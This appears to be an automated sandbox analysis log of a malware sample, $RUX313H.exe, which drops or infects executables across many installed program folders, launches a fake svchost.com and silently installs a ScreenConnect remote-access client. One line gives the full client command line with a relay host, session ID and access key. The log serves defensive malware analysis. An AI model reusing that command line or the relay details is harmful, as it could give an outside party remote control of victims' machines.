                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIFE7.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CR_94EB1.tmp\setup.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXEJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.dllJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\ScreenConnect.Core.dllJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\misc.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Core.dllJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                          Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Windows.dllJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to dropped file
                          Source: C:\Users\user\Desktop\$RUX313H.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_00406D40 GetLogicalDriveStringsA,GetDriveTypeA,0_2_00406D40
                          Source: C:\Users\user\Desktop\$RUX313H.exeAPI call chain: ExitProcess graph end nodegraph_0-9870
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeAPI call chain: ExitProcess graph end nodegraph_1-19810
                          Source: C:\Windows\svchost.comAPI call chain: ExitProcess graph end nodegraph_2-9871
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeFile opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exeJump to behavior
                          Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_00405080 FindFirstFileA,FindNextFileA,FindClose,0_2_00405080
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_00405634 FindFirstFileA,FindNextFileA,FindClose,0_2_00405634
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_00404F6C FindFirstFileA,FindClose,0_2_00404F6C
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose,0_2_0040F0C4
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose,0_2_0040F0CC
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040F13F FindFirstFileA,FindNextFileA,FindClose,0_2_0040F13F
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_004056A7 FindFirstFileA,FindNextFileA,FindClose,0_2_004056A7
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040EA04 FindFirstFileA,FindClose,0_2_0040EA04
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040EB16 FindFirstFileA,FindClose,0_2_0040EB16
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose,0_2_0040EB18
                          Source: C:\Windows\svchost.comCode function: 2_2_00405634 FindFirstFileA,FindNextFileA,FindClose,2_2_00405634
                          Source: C:\Windows\svchost.comCode function: 2_2_00404F6C FindFirstFileA,FindClose,2_2_00404F6C
                          Source: C:\Windows\svchost.comCode function: 2_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose,2_2_0040F0C4
                          Source: C:\Windows\svchost.comCode function: 2_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose,2_2_0040F0CC
                          Source: C:\Windows\svchost.comCode function: 2_2_00405080 FindFirstFileA,FindNextFileA,FindClose,2_2_00405080
                          Source: C:\Windows\svchost.comCode function: 2_2_0040F13F FindFirstFileA,FindNextFileA,FindClose,2_2_0040F13F
                          Source: C:\Windows\svchost.comCode function: 2_2_004056A7 FindFirstFileA,FindNextFileA,FindClose,2_2_004056A7
                          Source: C:\Windows\svchost.comCode function: 2_2_0040EA04 FindFirstFileA,FindClose,2_2_0040EA04
                          Source: C:\Windows\svchost.comCode function: 2_2_0040EB16 FindFirstFileA,FindClose,2_2_0040EB16
                          Source: C:\Windows\svchost.comCode function: 2_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose,2_2_0040EB18
                          Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCode function: 1_2_00DF1140 LoadLibraryW,GetProcAddress,CorBindToRuntimeEx,1_2_00DF1140
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCode function: 1_2_00DF13CC IsDebuggerPresent,1_2_00DF13CC
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCode function: 1_2_00DF435A EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00DF435A
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCode function: 1_2_00DF1EBA GetProcessHeap,1_2_00DF1EBA
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeProcess token adjusted: Debug
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCode function: 1_2_00DF2959 SetUnhandledExceptionFilter,1_2_00DF2959
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCode function: 1_2_00DF297C SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00DF297C
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeCode function: 9_2_003F3D97 SetUnhandledExceptionFilter,9_2_003F3D97
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeCode function: 9_2_003F3DC8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_003F3DC8
                          Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe 'C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe' '?e=Access&y=Guest&h=instance-qchhoo-relay.screenconnect.com&p=443&s=da6b3e03-98fc-419f-a376-8535999f3893&k=BgIAAACkAABSU0ExAAgAAAEAAQCXhSdnV8AclTo6Qg2d%2fUagHnAuTk77VdidkN%2fHwklWj60Ukj2cjyUWF%2fyj6%2bi86j%2f4iIiD4EcKkvFNApE%2f%2fmy7V5iz8I7WLvfaBXsciWcr9yEcfZSl4AvW0iWJ2LVg8s%2bvTxK6lFGCfPmCOGop3GjLhAffGO2uiyhzZdY3cdBnrxVR1d2KV8lAELZ5VBoUfKrKrkChwusd1M6gHfzfqZEpzKJahX9yu4v97YxVChPN3WG0TWWhcEs0ZJpQzPn3g2NaZ6xL5%2bVj8rp0nPDBPjXcy%2fWFzRXbyKOD%2fA0vieIxBiRLOIqNVTkIntBIZAUsEi%2bi0gvAM%2f6xLcwwLQe0K7rN'
                          Source: C:\Users\user\Desktop\$RUX313H.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe 'C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe' Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeProcess created: C:\Windows\svchost.com 'C:\Windows\svchost.com' 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\AppData\Local\Temp\setup.msi'Jump to behavior
                          Source: $RUX313H.exe, 00000000.00000002.1199004606.0000000000CB0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                          Source: $RUX313H.exe, 00000000.00000002.1199004606.0000000000CB0000.00000002.00020000.sdmp, ScreenConnect.WindowsClient.exeBinary or memory string: Shell_TrayWnd
                          Source: $RUX313H.exe, 00000000.00000002.1199004606.0000000000CB0000.00000002.00020000.sdmp, ScreenConnect.WindowsClient.exeBinary or memory string: Progman
                          Source: $RUX313H.exe, 00000000.00000002.1199004606.0000000000CB0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: GetLocaleInfoA,0_2_0040D74C
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: GetLocaleInfoA,0_2_00403CB4
                          Source: C:\Windows\svchost.comCode function: GetLocaleInfoA,2_2_0040D74C
                          Source: C:\Windows\svchost.comCode function: GetLocaleInfoA,2_2_00403CB4
                          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.dll VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.dll VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Client.dll VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Core.dll VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Windows.dll VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Client.dll VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Core.dll VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Windows.dll VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
